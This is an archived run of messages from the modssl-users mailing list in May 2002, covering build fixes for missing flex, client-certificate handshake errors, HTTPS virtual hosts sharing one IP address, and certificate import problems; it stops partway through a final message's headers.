From owner-modssl-users@modssl.org  Mon May 20 23:29:33 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA14536; Mon, 20 May 2002 23:28:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id XAA14487; Mon, 20 May 2002 23:27:09 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4KLPsI20406
	for ; Mon, 20 May 2002 17:25:54 -0400
Date: Mon, 20 May 2002 17:25:54 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: "'modssl-users@modssl.org'" 
Subject: RE: make fails - no flex
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 20 May 2002, Petryczka, George wrote:

> Won't touching those files cause some component not to be built?
> And thanks.

Nope.  They're generated files distributed along with mod_ssl.  If somehow
their timestamps get to be older than the .y and .l files they came from,
the Makefile will want to regenerate them using flex and yacc.  But you
shouldn't need to regenerate them.  Touching them to update their
timestamps will harm nothing; the next time you run make, it will see that
the .c and .h files are up to date, but it will recognize that the
corresponding .o files are out of date and just compile the two files.
Done.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 23:31:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA14759; Mon, 20 May 2002 23:30:54 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id XAA14596; Mon, 20 May 2002 23:29:21 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4KLS6g20419
	for ; Mon, 20 May 2002 17:28:06 -0400
Date: Mon, 20 May 2002 17:28:06 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: "'modssl-users@modssl.org'" 
Subject: RE: make fails - no flex
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 20 May 2002, Petryczka, George wrote:

> Actually i just tried touching the three files and i still get that same
> error.  I'll try downloading a flex if i can find it.  Would lex work
> though?

>> touch ssl_expr_parse.c
>> touch ssl_expr_parse.h
>> touch ssl_expr_scan.h

Crap, my fault... that last one should have been

touch ssl_expr_scan.c

There is no ssl_expr_scan.h.

--Cliff


(To answer your question, flex is found at
http://www.gnu.org/software/flex/flex.html , though like I said you
shouldn't need it.  And no, regular lex probably won't work, as flex has
some GNU extensions over regular lex, and ssl_expr_scan.l *might* actually
use them.)

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 21 00:15:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA18175; Tue, 21 May 2002 00:14:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from executor.cambridge.redhat.com id AAA17695; Tue, 21 May 2002 00:13:15 +0200 (MET DST)
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by executor.cambridge.redhat.com (Postfix) with ESMTP
	id 974C2ABAF8; Mon, 20 May 2002 23:13:10 +0100 (BST)
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.11.6/8.11.0) id g4KMD9S26372;
	Mon, 20 May 2002 23:13:09 +0100
X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Mon, 20 May 2002 23:13:09 +0100
From: Joe Orton 
To: "'modssl-users@modssl.org'" 
Cc: rse@apache.org
Subject: Re: make fails - no flex
Message-ID: <20020520231309.A26200@redhat.com>
Mail-Followup-To: "'modssl-users@modssl.org'" ,
	rse@apache.org
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from jwoolley@apache.org on Mon, May 20, 2002 at 05:28:06PM -0400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, May 20, 2002 at 05:28:06PM -0400, Cliff Woolley wrote:
> >> touch ssl_expr_parse.c
> >> touch ssl_expr_parse.h
> >> touch ssl_expr_scan.h
> 
> Crap, my fault... that last one should have been
> 
> touch ssl_expr_scan.c
> 
> There is no ssl_expr_scan.h.

HP-UX make can be tricky here though because it will try to regenerate a
target if it has exactly the same mtime as a dependency, unlike other
makes.  Naively combining all of the above into a single 'touch'
invocation (or typing fast ;) would guarantee that lex is still run,
because ssl_expr_scan.c depends on ssl_expr_parse.h.

I think this should guarantee no flex/yacc invocations:

touch ssl_expr_parse.[ch] ssl_expr_scan.l
sleep 1
touch ssl_expr_scan.c

Ralf if you're listening, it would be good to do something like that for
the tarballs, since the timestamps are all the same by default at the
moment, so it always breaks on HP-UX.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 21 09:17:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA21297; Tue, 21 May 2002 09:16:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA21245; Tue, 21 May 2002 09:15:57 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E6E234CE72D; Tue, 21 May 2002 09:15:55 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A8CF92874E; Tue, 21 May 2002 07:50:17 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from flashmail.com id SAA23261; Mon, 20 May 2002 18:10:36 +0200 (MET DST)
Received: (qmail 10766 invoked from network); 20 May 2002 16:09:31 -0000
Received: from unknown (HELO flashmail.com) (80.34.84.165)
  by 0 with SMTP; 20 May 2002 16:09:31 -0000
Message-ID: <3CE91EB8.25AF64F2@flashmail.com>
Date: Mon, 20 May 2002 18:05:12 +0200
From: Pako <_pako_@flashmail.com>
Organization: APTICE
X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.7-10 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: negotiation handshake failed: Not accepted by cient!?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Pako <_pako_@flashmail.com>
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi, I had instaled apache with openssl, modssl and php the  last two as
modules of apache, I had created my own CA certificate, Server
certificate and User certificate, using openssl functions, and i'm
trying to use it for test my server with SSL and i'm loosing hair
rapidly.

I had some problems with the handsake secuence, at first when i load my
secure site everything work, but i been asked for two times for my user
certificate, i don't know for what but if the second time i cancel the
presentation of certificate some of the images of my site don't load. My
page use frames, and everything is keeped in the same page, my images
are simple gifts and there's no diferrence aparently between the images
that load or the ones that not.

I think this could be a problem with the SSL Cache but i had it
activated in my httpd.conf

    SSLSessionCache         dbm:/opt/apache1.3.22/logs/ssl_scache
    SSLSessionCacheTimeout  300

when i start apache i get the two files ssl_cache.dir and ssl_cache.pag,
but i still had to presentate my user certificate for every link that i
use in my site, and every time that i use it. Sometimes witouth aparent
relation with the operations that i had made my netscape closes and i
get in my error_log the next:

[Tue May  7 17:42:39 2002] [error] mod_ssl: Re-negotiation handshake
failed: Not accepted by client!?
[Tue May  7 17:42:39 2002] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)
[Tue May  7 17:42:39 2002] [error] OpenSSL: error:1408F071:SSL
routines:SSL3_GET_RECORD:bad mac decode [Hint: Browser still remembered
details of a re-created server certificate?]

I don't know what to do, I'm using SSL_Require sentencies and maybe the
problem be there, I don't know I use the next sintax an i think it's ok


                SSLVerifyClient require
                SSLVerifyDepth 5
                SSLOptions           -FakeBasicAuth +ExportCertData
                SSLRequireSSL
                SSLRequire ( %{SSL_CLIENT_S_DN_O} in {"TEST"} )


Help please, and sorry for the English ...

                    Pako.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 21 09:22:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA21690; Tue, 21 May 2002 09:21:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA21652; Tue, 21 May 2002 09:20:39 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5B7AB4CE72D; Tue, 21 May 2002 09:20:38 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 208DD28739; Tue, 21 May 2002 09:19:59 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id AAA19080; Tue, 21 May 2002 00:22:08 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 20 May 2002 15:22:01 -0700
Received: from 66.146.37.55 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Mon, 20 May 2002 22:22:01 GMT
X-Originating-IP: [66.146.37.55]
From: "john smith" 
To: modssl-users@modssl.org
Subject: client cert-->connection resets
Date: Mon, 20 May 2002 22:22:01 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 May 2002 22:22:01.0834 (UTC) FILETIME=[C3908CA0:01C2004C]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "john smith" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

All,

Using client certs and getting connection resets when I issue a redirect 
back to the same server as the original request.  When connection resets I 
loose the original ssl sessin id.  It there a way to a redirect with out the 
connection being reset?


Thanks in advance!

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 21 10:04:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA24700; Tue, 21 May 2002 10:03:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id KAA24688; Tue, 21 May 2002 10:02:54 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA21903
	for ; Tue, 21 May 2002 10:02:48 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma021901; Tue, 21 May 02 10:02:43 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA07566
	for ; Tue, 21 May 2002 10:02:42 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA01768
	for ; Tue, 21 May 2002 10:02:39 +0200 (MEST)
Message-ID: <3CE9FF1F.1E846D31@bourse.ch>
Date: Tue, 21 May 2002 10:02:39 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.20 and ModSSL
References: <000801c1fdde$ba2f3eb0$29121e40@dom.l9.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Jason Lawrence wrote:
> 
> I am trying to use two the Apache NameVirtualHost option with two sites
> using different certificate files.
> 
> The two virtual hosts work however only the cert for the first specified
> virtual host is recognized.  Is there anyway that you can get two
> certificates working in Apache for the same IP address????

It is impossible to have two distinct HTTPS virtualhosts on the same
socket (IP address/port no. pair). See:

http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47
http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2

Just to be clear, the issue is fundamental to the way HTTP works - it is
not a bug in apache or mod_ssl!

Rgds,

Owen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 21 14:43:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA13026; Tue, 21 May 2002 14:42:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from andor.altrion.org id OAA12980; Tue, 21 May 2002 14:41:32 +0200 (MET DST)
Received: from ciaudio.dircon.co.uk (there) [195.157.62.136] 
	by andor.altrion.org with smtp (Exim 3.12 #1 (Debian))
	id 17A8x9-00063P-00; Tue, 21 May 2002 12:41:25 +0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: Mike Whitaker 
To: modssl-users@modssl.org
Subject: SSL_R_INTERNAL_ERROR while handshaking
Date: Tue, 21 May 2002 12:41:18 +0000
X-Mailer: KMail [version 1.3.2]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Whitaker 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

[Also posted to openssl-users]

Can anyone shed any light on the following?

We have a customer's SSL client talking to a CGI on a mod_ssl enabled 
Apache. The CGI (Perl) basically reads a POST request and copies the whole 
of stdin to a file, and that's it. (It does remember to close the file, 
and returns a 200 and an empty text/plain document.)

The first time, everything works fine. Second and subsequent attempts get 
the following. After about 30 mins, something seems to time out, the next 
request works, and again subsequent ones fail...

[Mon May 13 00:03:16 2002] [error] mod_ssl: SSL handshake failed (server 
customer.confidential:443, client nnn.nnn.nnn.nnn) (OpenSSL library error 
follows)
[Mon May 13 00:03:16 2002] [error] OpenSSL:  
error:14094438:lib(20):func(148):reason(1080)

According to my not-very-expert reading of the source, this seems to be 
the error SSL_R_INTERNAL_ERROR from ssl3_read_bytes in OpenSSL, which 
appears to translate very roughly to "What the **** was THAT pattern of 
bytes, 'cause it sure wasn't supposed to happen right here!"

OpenSSL version, to the current limit of my knowledge, is newer than 
0.9.6b (it has the fix for big CA lists in handshaking). I can get more 
details from the customer, but they ain't awake yet (being US-based) and 
it'd be good to know what else to ask.
-- 
Mike Whitaker      mike@altrion.org    +44-1733-327545

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 21 21:51:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA12954; Tue, 21 May 2002 21:50:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA12874; Tue, 21 May 2002 21:48:21 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 99D0F4CE754; Tue, 21 May 2002 21:48:18 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 64FE82874D; Tue, 21 May 2002 21:46:31 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cerbere1.sepro-robotique.com id QAA19012; Tue, 21 May 2002 16:25:26 +0200 (MET DST)
Received: from sepro-robotique.com (unverified) by cerbere1.sepro-robotique.com
 (Content Technologies SMTPRS 4.1.5) with ESMTP id  for ;
 Tue, 21 May 2002 16:21:42 +0200
Message-ID: <3CEA58EE.F39A67FA@sepro-robotique.com>
Date: Tue, 21 May 2002 16:25:50 +0200
From: GRASSET Guillaume 
Organization: Service =?iso-8859-1?Q?Syst=E8me?=
X-Mailer: Mozilla 4.74 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Import certificates in Netscape
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: GRASSET Guillaume 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I have installed apache with mod_ssl and it works well.
Then I create client certificates with openssl, all is OK, but when I
want to import them in Netscape (4.74) I have an error like :
"Unable to import certificates. the file specified is either corrupt or
is not a valid file."


I don't find it in FAQ List, so if anybody can help me...


Thanks in advance

Guillaume Grasset


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 21 22:20:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA15085; Tue, 21 May 2002 22:19:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id WAA15066; Tue, 21 May 2002 22:18:54 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 21 May 2002 16:19:41 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: make cert failed
Date: Tue, 21 May 2002 16:19:34 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Just installed it all.
Accessed http://myaddr:8080 just fine.
Tried to access https://myaddr:8443 and got a "Security Alert" pop-up which
led me on to "install in Trusted Root Certificate Authority store" which
seemed to succeed.
Tried to access again and still get the same security alert pop-up.

ssl_engine_log shows nothing bad except an initial warning "Common name does
not match server name".  So I figured maybe i need to put the exact FQDN in
there for CN so i went and tried to do a "make certificate" again only that
failed in step 3 (generating cert with snake oil)  "error 10 at 1 depth
lookup:certificate has expired".

Do i need the FQDN in the CN setting?
Should i have deleted the old certificate info somehow first before re-doing
make certificate?
Do i need to re-do the make install?

-george

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 22 09:10:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA10442; Wed, 22 May 2002 09:09:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inzen.com id JAA10364; Wed, 22 May 2002 09:08:04 +0200 (MET DST)
Received: from Nazgul33TP (sslproxy.anonymous [10.4.1.102])
	(authenticated)
	by mail.inzen.com (8.11.6/8.11.6) with ESMTP id g4M7GFJ15959
	for ; Wed, 22 May 2002 16:16:15 +0900
From: "Han, Donghoon" 
To: 
Subject: [Q] VirtualHost problems..
Date: Wed, 22 May 2002 16:07:58 +0900
Organization: =?us-ascii?B?QUlBPw==?=
Message-ID: <000501c2015f$678e38d0$0313030a@Nazgul33TP>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Han, Donghoon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi everyone,

I recently configured several named virtual hosts on my Apache 1.3.24
server.

NameVirtualHost A.B.C.D:80
NameVirtualHost E.F.G.H:80
NameVirtualHost A.B.C.D:443
NameVirtualHost E.F.G.H:443

-- Several :80 virtual hosts --


ServerName blah.blah.com
SSLCertificateFile A.crt
SSLCertificateKeyFile A.key
-- other configurations --


ServerName blah2.blah2.com
SSLCertificateFile A2.crt
SSLCertificateKeyFile A2.key
-- other configurations --


I configured like this, but when I connect to blah2.blah2.com
Explorer gets the certificate of the first virtual host.
The other configurations are ok, I get authentication dialogs and
I get the right file as I configured the virtual host.
The only one problem is that I get the different certificate from the
one I configured. Did I miss something?

Thanks in advance.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 22 09:12:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA10587; Wed, 22 May 2002 09:11:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA10520; Wed, 22 May 2002 09:10:34 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A40E44CE73A; Wed, 22 May 2002 09:10:33 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B9CBF2873D; Wed, 22 May 2002 09:10:13 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.tatung.com id IAA09214; Wed, 22 May 2002 08:52:52 +0200 (MET DST)
Received: from sunfish (IDENT:root@smtp.tatung.com [139.223.11.159])
	by mail.tatung.com (8.11.2/8.11.2) with SMTP id g4M6nli23753
	for ; Wed, 22 May 2002 14:49:48 +0800
Message-ID: <00b401c2015d$66dde680$bf02df8b@tisnet.net.tw>
From: "ch" 
To: 
Subject: how to install mod_ssl at openunix 8.0.0 (caldera)? 
Date: Wed, 22 May 2002 14:53:37 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00B1_01C201A0.74301AE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "ch" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00B1_01C201A0.74301AE0
Content-Type: text/plain;
	charset="big5"
Content-Transfer-Encoding: quoted-printable


i tried to install mod_ssl-2.8.8-1.3.24 at openunix 8.0.0.
but failed.
the reason was apache_1.3.24 could not install at openunix 8.0.0.
only httpd-2.0.36 can.

how can i fix the problem?
any suggestion for me.

thanks for your help.


Best Regards
vincent lin

------=_NextPart_000_00B1_01C201A0.74301AE0
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: quoted-printable









 


i tried to install =
mod_ssl-2.8.8-1.3.24 at=20
openunix 8.0.0.


but =
failed.


the reason was =
apache_1.3.24 could not install=20
at openunix 8.0.0.


only httpd-2.0.36 =
can.


 


how can i fix the =
problem?


any suggestion for =
me.


 


thanks for your =
help.


 


 


Best =
Regards
vincent=20
lin


------=_NextPart_000_00B1_01C201A0.74301AE0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 22 09:26:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA11536; Wed, 22 May 2002 09:25:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inzen.com id JAA11503; Wed, 22 May 2002 09:24:31 +0200 (MET DST)
Received: from Nazgul33TP (sslproxy.anonymous [10.4.1.102])
	(authenticated)
	by mail.inzen.com (8.11.6/8.11.6) with ESMTP id g4M7WeJ16737
	for ; Wed, 22 May 2002 16:32:40 +0900
From: "Han, Donghoon" 
To: 
Subject: RE: how to install mod_ssl at openunix 8.0.0 (caldera)? 
Date: Wed, 22 May 2002 16:24:23 +0900
Organization: =?us-ascii?B?QUlBPw==?=
Message-ID: <000801c20161$b2bcac40$0313030a@Nazgul33TP>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0009_01C201AD.22A45440"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <00b401c2015d$66dde680$bf02df8b@tisnet.net.tw>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Han, Donghoon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0009_01C201AD.22A45440
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

I think httpd-2.0.36 already has SSL module.

Check it out.

 

Apache 2.0 contains SSL module.

 

 

Han, Donghoon 

Research Staff at InZen(http://www.inzen.com  )
R&D Center.

 

MSN Messenger : nazgul33@msn.com

http://www.nazgul33.com  

 

( poweroff@inzen.com will be available until the end of March, 2002 )

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of ch
Sent: Wednesday, May 22, 2002 3:54 PM
To: modssl-users@modssl.org
Subject: how to install mod_ssl at openunix 8.0.0 (caldera)? 

 

 

i tried to install mod_ssl-2.8.8-1.3.24 at openunix 8.0.0.

but failed.

the reason was apache_1.3.24 could not install at openunix 8.0.0.

only httpd-2.0.36 can.

 

how can i fix the problem?

any suggestion for me.

 

thanks for your help.

 

 

Best Regards
vincent lin


------=_NextPart_000_0009_01C201AD.22A45440
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable




















I think =
httpd-2.0.36
already has SSL module.



Check it =
out.



 



Apache 2.0 =
contains SSL
module.



 









 






Han, Donghoon =
<nazgul33@inzen.com>



Research Staff =
at InZen(http://www.inzen.com) =
R&D Center.



 



MSN Messenger : =
nazgul33@msn.com



http://www.nazgul33.com



 



( poweroff@inzen.com will be =
available until
the end of March, 2002 )






-----Original
Message-----

From:
owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of ch

Sent: Wednesday, May 22, =
2002 3:54
PM

To: =
modssl-users@modssl.org

Subject: how to install =
mod_ssl at
openunix 8.0.0 (caldera)? 



 






 









i tried to install mod_ssl-2.8.8-1.3.24 at openunix =
8.0.0.









but failed.









the reason was apache_1.3.24 could not install at openunix =
8.0.0.









only httpd-2.0.36 can.









 









how can i fix the problem?









any suggestion for me.









 









thanks for your help.









 









 









Best Regards

vincent lin












------=_NextPart_000_0009_01C201AD.22A45440--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 22 09:42:35 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA12030; Wed, 22 May 2002 09:41:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id JAA11977; Wed, 22 May 2002 09:40:35 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA00295
	for ; Wed, 22 May 2002 09:40:29 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma000293; Wed, 22 May 02 09:40:20 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA16648
	for ; Wed, 22 May 2002 09:40:19 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
